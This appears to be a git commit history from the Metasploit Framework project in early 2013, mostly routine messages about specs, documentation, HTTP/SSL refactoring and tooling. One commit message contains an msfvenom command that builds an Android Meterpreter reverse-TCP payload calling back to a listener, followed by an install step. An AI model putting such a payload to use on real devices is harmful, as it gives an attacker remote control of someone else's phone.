Meatballs
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
sinn3r
b1e49e7116
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2013-04-25 20:54:28 -05:00
sinn3r
5b0ae1476b
Let's word this a little differently
2013-04-25 20:52:51 -05:00
Meatballs
b58a775af5
Added opt delay to file_dropper
2013-04-25 20:52:51 -05:00
sinn3r
008266a581
Corrects documentation. Thanks Meatballs1
2013-04-25 19:13:16 -05:00
sinn3r
ff87e3622b
Changes made according to feedback from Juan and James
2013-04-25 15:19:44 -05:00
Luke Imhoff
9207ed6532
Msf::Ui::Console::CommandDispatcher::Core#search_modules_sql spec
...
[#47979793 ]
2013-04-25 14:33:13 -05:00
James Lee
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Luke Imhoff
24b97137ea
Msf::DBManager Mdm::Module* specs
...
[#47979793 ]
2013-04-25 09:46:53 -05:00
sinn3r
6642545551
Adds new JavaScript function "js_download"
...
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
James Lee
93bddd9041
Improved docs and partial specs for Rex::Text
...
Conflicts:
lib/msf/core/modules/loader/base.rb
lib/rex/poly/block.rb
lib/rex/text.rb
2013-04-23 17:24:03 -05:00
xard4s
cc52619a14
Fix trailing whitespace in zip files
2013-04-23 13:53:38 -04:00
Meatballs
fab1781812
Refactored to send custom commands
2013-04-22 10:04:38 +01:00
Meatballs
6656514616
Msftidy
2013-04-21 14:34:47 +01:00
Meatballs
fc621e8d7e
Parse ssp correctly
2013-04-21 10:55:01 +01:00
Meatballs
83fbc3e46f
Small fix and attribution to gentilkiwi
2013-04-21 00:36:43 +01:00
Luke Imhoff
492b081280
Msf::DBManager::Export#extract_module_detail_info spec
...
[#47979793 ]
2013-04-20 16:44:42 -05:00
Meatballs
cec737d399
tidy and table header
2013-04-20 18:05:47 +01:00
Meatballs
b219a23f00
Refactoring
2013-04-20 18:00:46 +01:00
Meatballs
20849714ac
Add all methods
2013-04-20 17:27:32 +01:00
Meatballs
ddaa09edad
Added msv
2013-04-20 16:31:45 +01:00
Meatballs
83578dec68
Getprivs by default
2013-04-20 14:59:07 +01:00
Meatballs
a23d7bb66f
Add client UI and parse results
2013-04-20 12:20:38 +01:00
Meatballs
5fa81942db
Initial comms
2013-04-19 22:19:50 +01:00
Luke Imhoff
e5befb7094
Msf::DBManager#report_session specs
...
[#47979793 ]
2013-04-19 10:11:33 -05:00
Nathan Einwechter
f8fc05bbf9
streamline var assignment
2013-04-18 17:05:28 -04:00
Nathan Einwechter
c758831962
streamline var assignment
2013-04-18 17:04:03 -04:00
Nathan Einwechter
d9187056c8
msftidy
2013-04-18 13:14:26 -04:00
Nathan Einwechter
288111be4e
Fixes RM7883 along with related issue
...
modified: lib/msf/ui/console/command_dispatcher/db.rb
2013-04-18 13:08:32 -04:00
Josh
c23cf47d74
Fix RM7896, global show opts has non-eval #{text}
...
thx to mudge for reporting & jduck for properly blaming me.
This change also causes the actual DefaultPromptChar to be displayed vs a hard coded ">"
2013-04-15 22:07:28 -05:00
Tod Beardsley
25fcbd4e70
Landing #1733 , setting a sensible heapsray offset
...
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
Tod Beardsley
4d21c7dff5
Landing #1727 , adding @jlee-r7's new fingerprints
2013-04-15 13:49:59 -05:00
Tod Beardsley
7f8040c4e4
Lands #1722 , Rex::Socket comment docs
2013-04-15 13:44:00 -05:00
Luke Imhoff
2c681005c0
Msf::ModuleManager::Cache spec coverage
...
[#47979793 ]
2013-04-15 13:08:12 -05:00
timwr
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
scriptjunkie
2c41ca6598
Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework
2013-04-12 21:10:44 -05:00
sinn3r
d28db8a2a3
Forgot the comment
2013-04-12 20:21:10 -05:00
sinn3r
f2cbbf43e8
Changes default offset
...
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
James Lee
2c8ec656ca
Typo
2013-04-11 22:36:08 -05:00
James Lee
7df80c7aac
Add a couple new IE fingerprints to osdetect.js
2013-04-11 22:29:02 -05:00
RageLtMan
1e93ae65e3
fix typo in parameters
2013-04-11 19:12:32 -04:00
RageLtMan
5ac18e9156
commant update
2013-04-11 19:11:25 -04:00
RageLtMan
6eb33ae5ed
Rex::Socket::SslTcp set cipher and verify_mode
...
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.
Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```
Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
2013-04-11 18:00:33 -04:00
James Lee
6a0b240d10
Add some better docs for Rex::Socket
2013-04-10 12:41:41 -05:00
Rob Fuller
2949c4a339
enable stage encoding for reverse_http(s)
2013-04-10 12:10:17 -03:00
Tod Beardsley
6a5d318749
Bumping version.
2013-04-10 08:59:56 -05:00
sinn3r
277bc69140
Merge branch 'bug/rm7288-post-rename' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7288-post-rename
2013-04-08 10:18:09 -05:00
Tod Beardsley
bbce53816c
Merges #1706 , removing gemcache per brandont
...
This has been put off for a long while.
2013-04-05 10:12:04 -05:00
James Lee
cd86a69090
Have Post::File use shiny new session.fs.file.mv
...
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
James Lee
067140643e
Landing #1579 , meterpreter mv
...
See rapid7/meterpreter/#6
2013-04-04 23:42:31 -05:00
James Lee
ad46b46684
Landing #1463 , Meatballs' cdecl fixes
2013-04-04 22:58:59 -05:00
Brandon Turner
6251dd571e
Always use bundler to load gems
2013-04-04 16:41:40 -05:00
Brandon Turner
06537e0ab1
Remove the gemcache loader and tools
2013-04-03 16:24:56 -05:00
Brandon Turner
8ceede6460
Remove the gemcache
2013-04-03 16:24:55 -05:00
Luke Imhoff
809969b49f
Merge branch 'master' into feature/patchable-web-vuln-import
2013-04-02 22:38:54 -05:00
Luke Imhoff
47842aa6a2
Fix 'Output is not a module'
...
[#46491831 ]
I missed that Rex::Ui::Text::Output was a class and not a module, so
starting up prosvc fell over when it loaded
rex/ui/text/output/buffer/stdout, which also would screw up
msf/ui/console/command_dispatcher/core.rb where I original added
Rex::Ui::Text::Output::Buffer::Stdout.
2013-04-01 20:16:28 -05:00
Tasos Laskos
f1bc4a76c5
Anemone::Page#links: removed upwards dir traversal
...
[Finishes #47241427 ]
2013-04-02 00:49:40 +03:00
Luke Imhoff
0bb79ba890
Msf::DBManager#import_msf_xml refactor
...
[#46491831 ]
Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns. The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
Luke Imhoff
2317e9cced
Fix yard tag warnings
...
[#46491831 ]
2013-03-30 17:13:12 -05:00
Luke Imhoff
7ed2812ec3
Fix Cannot resolve link YARD warnings
...
[#46491831 ]
2013-03-30 16:58:49 -05:00
Luke Imhoff
bc4b87ebd9
Fix Undocumentable method defined on object instance YARD warnings
...
[#46491831 ]
Change code to use format that YARD can document without changing
semantics.
2013-03-30 16:05:12 -05:00
Luke Imhoff
c210260845
Fix Undocumentable method, missing name YARD warning
...
[#46491831 ]
Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call. By removing the ##, the
warning disappeared. I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
Tasos Laskos
e9b183cda2
Anemone::Page#links: restored upwards dir traversal
...
[FIXRM #7853 ]
2013-03-29 23:07:46 +02:00
sinn3r
463725efec
Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke
2013-03-29 09:30:21 -05:00
scriptjunkie
79a72a18a9
Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework
2013-03-27 18:30:07 -05:00
sinn3r
7bf87f3546
Merge branch 'mipsbe_elf' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mipsbe_elf
2013-03-27 11:55:09 -05:00
Tasos Laskos
380f5f56ae
Auxiliary::Web::HTTP#_request: print_error => elog
...
[SEERM #7839 ]
Reverted earlier commit.
2013-03-27 16:36:50 +02:00
David Maloney
a87e414274
fix winrm poke method
2013-03-26 13:05:33 -05:00
jvazquez-r7
a644ceb016
Added support for mipsbe elf
2013-03-26 17:20:43 +01:00
jvazquez-r7
4fff624632
added initial support for ELF misple
2013-03-26 01:08:31 +01:00
David Maloney
509ae76dc9
make sure we grab the workspace for store_local
...
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
sinn3r
0634cb9892
Need to avoid badchar 0x00
...
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
sinn3r
566806487c
Randomize the "div_container" var because it's global
...
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
sinn3r
1ac31a3e12
Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update
2013-03-22 12:54:23 -05:00
Tod Beardsley
bf85545b4d
Fix egypt's typo
2013-03-20 17:15:14 -05:00
Brandon Turner
49963ad4f1
Update MDM in gemcache
2013-03-20 13:23:40 -05:00
sinn3r
cce74246d8
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-19 15:03:24 -05:00
Tod Beardsley
6618c098c4
Merges 'bug/obsolete-activerecord-patch'
...
Not only does this remove the patch, but adds in specs to cover the test
cases that the patch resolved. Verified all steps and landed #1592 before
landing #1611 , so this is complete.
[Closes #1611 ]
2013-03-19 13:10:42 -05:00
Tod Beardsley
d987693238
Merges 'feature/rake-db'
...
Implements rake db tasks for Metasploit Framework. Woot! Verified all
steps listed in #1592 as well.
[Closes #1592 ]
2013-03-19 12:56:59 -05:00
Tasos Laskos
11c38d925b
Auxiliary::Web::Path: Fuzzable API update
...
[FIXRM #7817 ]
Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
Tasos Laskos
ad39a5cdc3
Auxiliary::Web::HTTP#_request: elog => print_error
...
[SEERM #7815 ]
Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
Tod Beardsley
1873053a34
Restore win32pe as the default (not _only)
2013-03-18 15:55:01 -05:00
Tod Beardsley
3a183ffa94
Retabbed for consistent whitespace
2013-03-18 15:40:26 -05:00
Tod Beardsley
418a373f6c
Avoid merge conflict over Id SVN tag
2013-03-18 15:39:16 -05:00
Tod Beardsley
afcbaffa2b
Revert "add -R capability like hosts -R"
...
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.
This reverts commit 52596ae3b4
.
2013-03-18 15:28:19 -05:00
Tod Beardsley
91e3f4cca6
Merge 'kernelsmith/msfconsole-grep'
...
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.
[Closes #1320 ]
Conflicts:
lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
Luke Imhoff
2075a7b46c
Remove active_record patch
...
[#46141013 ]
Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
Luke Imhoff
f1a4fd937a
Specs for activerecord patch
...
[#46141013 ]
Spec the desired behavior for ConnectionPool prior to removing the patch
to sync with upstream 3.2.12.
2013-03-18 11:01:45 -05:00
Luke Imhoff
2604fad164
Allow use of rake db tasks
...
[#46224565 ]
The following rake tasks are added and work similar to how they work in
rails apps:
* db:create
* db:drop
* db:migrate
* db:migrate:status
* db:rollback
* db:schema:dump
* db:schema:load
* db:seed (but no db seeds defined at this time)
* db:setup
* db:version
The hidden task db:test:prepare is also available, which means `rake
spec` can depend on it so that the test database is dropped and
recreated from the development database when running specs (Although
there are yet to be database tests, this branch is in preparation for
that work that will be split between multiple developers.)
2013-03-14 15:46:18 -05:00
Tod Beardsley
f46ec73ff0
Fix up usage help for loot cmd
2013-03-14 14:37:15 -05:00
Tod Beardsley
3dca63fee2
Make it clear that you're deleting all loot
...
You don't get to delete just one chunk of loot.
2013-03-14 14:37:15 -05:00
Joshua Abraham
56611230ff
fixed header
2013-03-14 14:37:15 -05:00
Joshua Abraham
0ca0cd5ee1
loot add/remove command for msfconsole
2013-03-14 14:37:15 -05:00
Tasos Laskos
5967991f6f
Auxiliary::Web#log_*: details[:category] => #name
...
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
James Lee
32bf7cf8f4
Merge remote-tracking branch 'tasos-r7/bug/web-fuzzable-path' into rapid7
...
[Closes #1578 ]
2013-03-12 12:31:32 -05:00
RageLtMan
d399093d80
Add Framework side of stdapi.fs.file.mv
...
Add the appropriate methods to Rex side of the FS extension and
the commensurate command dispatcher.
Requires https://github.com/rapid7/meterpreter/pull/6 from the
meterpreter repo as well as compiling fresh DLL for
ext_server_stdapi.
2013-03-12 02:06:38 -04:00
Tasos Laskos
c641ca96c1
Auxiliary::Web::Path.from_model: inputs => form.inputs
...
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
Raphael Mudge
d764740779
Convert user/pass tokens to ASCII in db.rb
...
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.
The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
jvazquez-r7
f0cee29100
modified CommandDispatcher::Exploit to have the change into account
2013-03-11 18:08:46 +01:00
dmaloney-r7
87f84513bf
Merge pull request #1564 from rapid7/feature/metasploit_data_models-0.6.2
...
Update to metasploit_data_models 0.6.2
2013-03-09 13:49:48 -08:00
Spencer McIntyre
bf54b582c9
Condense the decoder commands
2013-03-08 16:29:03 -05:00
Tasos Laskos
7e15788bb5
Auxiliary::Web: updated form of vuln storage in parent
...
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
Spencer McIntyre
8b5a83c7f5
Remove the DECODER option
2013-03-08 15:25:16 -05:00
Tasos Laskos
ac6065d8f9
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-08 21:50:49 +02:00
Tasos Laskos
3422a7c098
Auxiliary::Web: force vuln proof to_s
2013-03-08 21:50:01 +02:00
Spencer McIntyre
aceba9fc8a
Revert "escape ticks and spaces in paths"
...
This reverts commit 4c87b1ba36
.
2013-03-08 14:37:28 -05:00
James Lee
0a9b00e24c
Apparently missed part of mubix's original changes
...
Used by auxiliary/admin/smb/list_directory
2013-03-07 21:20:46 -06:00
Luke Imhoff
397361f5c6
Update gemcache to metasploit_data_models 0.6.2
2013-03-07 20:41:33 -06:00
James Lee
db676f1a88
Whitespace at EOL
2013-03-07 18:20:08 -06:00
James Lee
c3fa62cd59
Whitespace at EOL
2013-03-07 18:16:57 -06:00
Brandon Turner
725fbea851
Merge pull request #1563 from rapid7/bug/yard-guard
...
[Story #45771305 ]
Conflicts:
Rakefile
2013-03-07 17:35:03 -06:00
James Lee
43c076ed96
Merge remote-tracking branch 'tasos-r7/bug/web-vuln-logging' into rapid7
...
[Closes #1559 ]
2013-03-07 17:23:59 -06:00
Luke Imhoff
e912bec2db
Update gemcache to metasploit_data_models 0.6.1
...
[#45771305 ]
2013-03-07 14:30:29 -06:00
James Lee
f05431791f
Merge branch 'dmaloney-r7-feature/ssl/add_cipher_support' into rapid7
2013-03-07 12:54:39 -06:00
James Lee
27f43d3d1c
Param name goes before type
2013-03-07 12:50:43 -06:00
James Lee
c41bfa9141
Whitespace
2013-03-07 12:45:01 -06:00
Tasos Laskos
cf3df4b179
Auxiliary::Web::HTTP: added error output
...
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
David Maloney
06443ea4d0
yarddoc cleanup
2013-03-07 11:52:58 -06:00
David Maloney
007b26d918
dry up enumerators
2013-03-07 11:35:34 -06:00
David Maloney
7332d31523
fix some style things for egypt
2013-03-07 11:11:48 -06:00
Tasos Laskos
c3b3da4254
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 23:04:10 +02:00
James Lee
5dff043e3c
Whitespace
2013-03-06 14:52:32 -06:00
Tasos Laskos
d9a6f5f0ca
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 18:26:18 +02:00
Tasos Laskos
c497d5ffef
Auxiliary::Web: log methods pass vuln info to parent
2013-03-06 18:25:25 +02:00
Samuel Huckins
09fc52f3d9
Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
...
Use ActiveRecord::Migrator multiple migrations paths support
2013-03-06 08:20:36 -08:00
Luke Imhoff
fac941aae4
Update gemcache with metasploit_data_models 0.6.0
...
[#44034071 ]
2013-03-06 09:59:09 -06:00
James Lee
24c0da0adb
Merge branch 'rapid7' into doc/cleanup-peparsey
2013-03-05 21:00:26 -06:00
James Lee
27727df415
Merge branch 'R3dy-psexec-mixin2' into rapid7
2013-03-05 14:36:55 -06:00
James Lee
3acccd71f7
Whitespace and doc fix
2013-03-05 14:35:27 -06:00
James Lee
a928e5f963
Whitespace
2013-03-05 14:34:56 -06:00
James Lee
a64edb33c4
Make code sections look right in docs
2013-03-05 14:34:11 -06:00
David Maloney
f5c23e4b02
fix typo snaffu
2013-03-05 12:35:21 -06:00
David Maloney
1407886e83
Revert "fix a major typo snaffu"
...
This reverts commit c639de7ccc
.
2013-03-05 12:34:51 -06:00
David Maloney
c639de7ccc
fix a major typo snaffu
2013-03-05 12:33:37 -06:00
David Maloney
6eb334c925
a little more coverage
2013-03-05 00:01:09 -06:00
David Maloney
d909c00036
better spec coverage
2013-03-04 23:43:18 -06:00
James Lee
9084e2a3bb
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 21:10:39 -06:00
James Lee
ac63965e4d
Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7
2013-03-04 20:00:50 -06:00
David Maloney
3bb1b2b368
attempt to deal with specs
2013-03-04 19:25:20 -06:00
David Maloney
c121a4e9dc
Some more minor touchups
2013-03-04 18:42:08 -06:00
Brandon Turner
4e31187f72
Use start.sh to start Pro via go_pro command
...
start.sh (installed with community/pro on apt installs) automatically
starts dependency services (such as postgresql).
2013-03-04 18:35:47 -06:00
David Maloney
8b6b2fbce9
bad error handling fixed
2013-03-04 18:33:03 -06:00
Brandon Turner
370aed5973
Silence status output, it is distracting
2013-03-04 18:27:22 -06:00
Brandon Turner
fb0237a180
Fix typo
2013-03-04 18:26:59 -06:00
David Maloney
dc7c02e9e8
still trying to get around this sslv2 thing
2013-03-04 18:18:01 -06:00
David Maloney
246977e0cf
Address openssl sslv2 issues
...
Debian/Ubuntu ship openssl without sslv2 compiled in.
we now check for this ahead of time
2013-03-04 17:39:28 -06:00
David Maloney
12201c519a
make sure we close sockets
2013-03-04 16:34:29 -06:00
David Maloney
13ad5cf150
Merge branch 'master' into feature/ssl/add_cipher_support
2013-03-04 15:07:32 -06:00
James Lee
c0689a7d43
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 12:14:33 -06:00
David Maloney
6dcca7df78
Remove duplicated header issues
...
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
David Maloney
6d811ce4b9
empty passwords should be allowed
2013-03-04 09:09:11 -06:00
Luke Imhoff
0ddc6b3afa
Document Msf::DBManager#initialize_metasploit_data_models
2013-03-02 21:16:02 -06:00
Luke Imhoff
c9a162ac33
Correct return type of Msf::DBManager#migrate.
2013-03-02 21:09:45 -06:00
Luke Imhoff
af4b3fa287
Use ActiveRecord::Migrator multiple migrations paths support
...
[#44034071 ]
ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them. ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate. Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
Samuel Huckins
2e4760c486
Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
...
All steps passing as described.
2013-03-01 12:54:41 -08:00
Luke Imhoff
b855bd3f3a
Add metasploit_data_models 0.5.1 to gemcache
...
[#44034071 ]
2013-03-01 14:06:58 -06:00
Tasos Laskos
99a8ec593b
Fixing merge conflicts
2013-03-01 20:21:02 +02:00
David Maloney
4212c36566
Fix up basic auth madness
2013-03-01 11:59:02 -06:00
Samuel Huckins
7b8654a71d
Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
...
This reverts commit 3840ddccbc
, reversing
changes made to e1891f0836
.
2013-03-01 11:41:06 -06:00
Samuel Huckins
3840ddccbc
Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
...
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
David Maloney
902948e5d3
cleanup options
2013-03-01 11:01:00 -06:00
Tasos Laskos
862b813786
Auxiliary::Web: fixed confidence calc in log methods
2013-03-01 18:33:16 +02:00
Luke Imhoff
239e1934b8
Use migrations from metasploit_data_models
...
[#44034071 ]
metasploit_data_models version 0.5.0 copied the migrations from
metasploit-framework/data/sql/migrate to
metasploit_data_models/db/migrate so that specs could be written the Mdm
models in metasploit_data_models. As part of the specs, :null => false
columns that should be :null => true were discovered, so a new migration
was added, but to metasploit_data_models/db/migrate, so it could be
tested. Instead of replicating migrations back and forth, I'm removing
the migrations completely from metasploit-framework and changing the
default migration path in Msf::DbManager#migration_paths to
MetasploitDataModels.root.join('db', 'migrate').
2013-03-01 09:03:45 -06:00
James Lee
5a79fcd11e
Ensure we build only one Authorization header
...
Also fixes an issue where Host headers were generated with nil by
preferring the vhost from Client instead of the default nil from
ClientRequest.
2013-02-28 13:47:30 -06:00
sinn3r
18c0bb0ac8
Updates description again
2013-02-28 11:34:48 -06:00
sinn3r
8cb5da0794
One size rules them all.
2013-02-28 11:21:23 -06:00
sinn3r
722e077029
Update generic target
2013-02-28 11:09:52 -06:00
sinn3r
2c013cada8
Update documentation for default values
2013-02-28 11:05:18 -06:00
sinn3r
86d78939ad
Make objId optional
2013-02-28 11:01:15 -06:00
sinn3r
9f35452d73
Beef up the default values for precise alloc size and consistency
2013-02-28 10:35:40 -06:00
James Lee
425c245771
Axe set_cgi in favor of set_uri
...
They were identical except for a couple of extra bugs in set_cgi.
Also changes ```split("/")``` to ```split("/", -1)```, which behaves
correctly when the input has a seperator at the beginning or end.
2013-02-27 19:13:05 -06:00
James Lee
b0745b090a
Msf HTTP uses this directly, can't axe it
2013-02-27 17:54:31 -06:00
James Lee
4edd46216f
Refactor config -> opts
...
Puts all the evasion stuff in the same place as regular HTTP options to
make it easier to deal with.
2013-02-27 17:29:26 -06:00
James Lee
d5ae54cbb6
More accurate docs
2013-02-27 16:27:37 -06:00
sinn3r
bb02dc43b3
Documentation
2013-02-27 15:34:21 -06:00
sinn3r
312638d6a5
Correct allocation size for IE10
2013-02-27 14:32:39 -06:00
sinn3r
e3f0757304
Improved version thanks to corelanc0d3r
2013-02-27 14:08:57 -06:00
James Lee
d3b3587660
Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-27 14:01:57 -06:00
sinn3r
6723352b9a
Merge branch 'master' into setstringproperty_spray
2013-02-27 11:17:23 -06:00
sinn3r
2a7b4ee3d8
Merge branch 'master' into setstringproperty_spray
2013-02-27 11:15:52 -06:00
sinn3r
4085fa73c5
Merge branch 'stephenfewer-master'
2013-02-27 11:13:10 -06:00
Gerry Eisenhaur
724b32af17
Fixed the importing of NBE files
2013-02-26 16:55:26 -08:00
James Lee
7a7dd8975f
Hmm, turns out something actually used that
...
Despite comments to the contrary
2013-02-26 18:16:54 -06:00
James Lee
29df20996e
Move most of the configuration into ClientRequest
...
Also fixes in-place modification of the query string which resulted in
duplication of the GET parameters when calling #to_s more than once.
2013-02-26 17:38:09 -06:00
David Maloney
f16cec552a
increase timeout with new checks
2013-02-26 14:27:04 -06:00
David Maloney
2ec2489f52
Test for general ssl before testing ciphers
2013-02-26 14:26:14 -06:00
James Lee
579c11bc69
Set reasonable defaults for more things
...
All current tests are passing now
2013-02-26 14:25:46 -06:00
James Lee
d7de3b75a4
Format Authorization header like others
...
Also sorts the set_*_header methods
2013-02-26 14:18:20 -06:00
James Lee
c206ac4998
Set some reasonable defaults
...
Fixes a number of nil deref issues
2013-02-26 14:15:51 -06:00
David Maloney
1cb2717fe7
fix weak and strong cipher enumerators
2013-02-26 14:13:17 -06:00
sinn3r
38af8ba866
Merge branch 'feature/sqli-exploitation-mssql' of github.com:tasos-r7/metasploit-framework into tasos-r7-feature/sqli-exploitation-mssql
2013-02-26 13:41:32 -06:00
James Lee
d463460da7
Default cgi to true when not given
2013-02-26 13:33:54 -06:00
James Lee
764bbbb8e5
Whitespace
2013-02-26 13:33:19 -06:00
James Lee
5e0161d3f7
Reflect new ClientRequst in docs
2013-02-26 13:31:24 -06:00
David Maloney
1869cb5f8d
fix timeout
...
20 seconds is way too long for jsut opening a socket
2013-02-26 13:20:16 -06:00
James Lee
5ac20e1b02
Merge branch 'feature/http/authv2' of git://github.com/dmaloney-r7/metasploit-framework into dmaloney-r7-feature/http/authv2
...
Conflicts:
lib/rex/proto/http/client.rb
2013-02-26 12:08:00 -06:00
David Maloney
c104fa6d97
Add spec and a few fixes for set_uri
2013-02-26 11:01:16 -06:00
Brandon Turner
75a36ce171
Merge pull request #1154 from todb/feature/go_pro
2013-02-26 01:09:24 -06:00
Tod Beardsley
08275e8d83
Process.spawn instead of system
...
Per @bturner-r7's comment here:
https://github.com/rapid7/metasploit-framework/pull/1514#discussion_r3129535
2013-02-25 19:49:02 -06:00
Tod Beardsley
8cff88efac
Change from web ui to community / pro
2013-02-25 15:45:55 -06:00
David Maloney
d9627151c0
Add socket context option
...
Add the option for a socket context so pivoting will work
2013-02-25 15:01:42 -06:00
Brandon Turner
b6458d2bfa
Update MDM gem in gemcache
2013-02-25 15:01:08 -06:00
James Lee
1ce86b7adb
Whitespace
2013-02-25 14:29:10 -06:00
James Lee
e41922853e
Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-25 14:15:22 -06:00
Tasos Laskos
0421cff913
Exploit::Remote::Web#perform_request: timeout set to 10
2013-02-25 19:49:39 +02:00
Tod Beardsley
2141492654
Per @brandont comment, use exit status instead.
2013-02-24 15:24:21 -06:00
HD Moore
ed93a7932c
Clean up Iconv usage and fix indents
2013-02-24 13:11:15 -06:00
HD Moore
b1355fa326
Avoid utf8 regular expression error in Ruby 2.0
2013-02-24 13:10:40 -06:00
HD Moore
8e8fecd208
Prefer String#encode over Iconv for Ruby 2.0 compat
2013-02-24 13:10:16 -06:00
HD Moore
9d9d83cf8b
Implement per-target arch/platform searches SeeRM #7754
2013-02-24 11:06:29 -06:00
Tod Beardsley
5e1119e2ed
A little more error handling for browser launches
...
Implement a timeout and deal with the case where xdg-open isn't
avialable for whatever reason.
2013-02-24 10:23:12 -06:00
Tod Beardsley
8010cdbd8b
Shuffled methods around
2013-02-24 09:33:15 -06:00
Tod Beardsley
8caedd4290
Can't apt-get install inside msfconsole
...
At least, you can't and expect the service to connect correctly. You
must exit msfconsole and restart it for the migrations to take place.
2013-02-23 23:41:14 -06:00
Tod Beardsley
a7c0d62106
Cleanup after some testing
2013-02-23 23:33:08 -06:00
Tod Beardsley
d5a074283a
Fill in the details of starting, launching, etc
2013-02-23 22:38:29 -06:00
Tod Beardsley
a3886a1a6b
No smartquotes plz
2013-02-23 17:17:18 -06:00
Tod Beardsley
b80343817c
Skeleton for acutally go_pro'ing
2013-02-23 09:48:18 -06:00
Tod Beardsley
90a1dcffa3
Adds a random banner offering go_pro
2013-02-23 09:36:06 -06:00
Tod Beardsley
2af930f1ff
Adds msfbase_dir, switches on apt existance
2013-02-23 09:19:31 -06:00
Tod Beardsley
0977d1a9b0
help shouldn't go past 80 columns
2013-02-23 08:49:47 -06:00
Tod Beardsley
7509501b18
Adding a go_pro command
2013-02-23 08:46:51 -06:00
sinn3r
aa007b9e0a
Updates
2013-02-22 20:07:16 -06:00
James Lee
fc07bf16e7
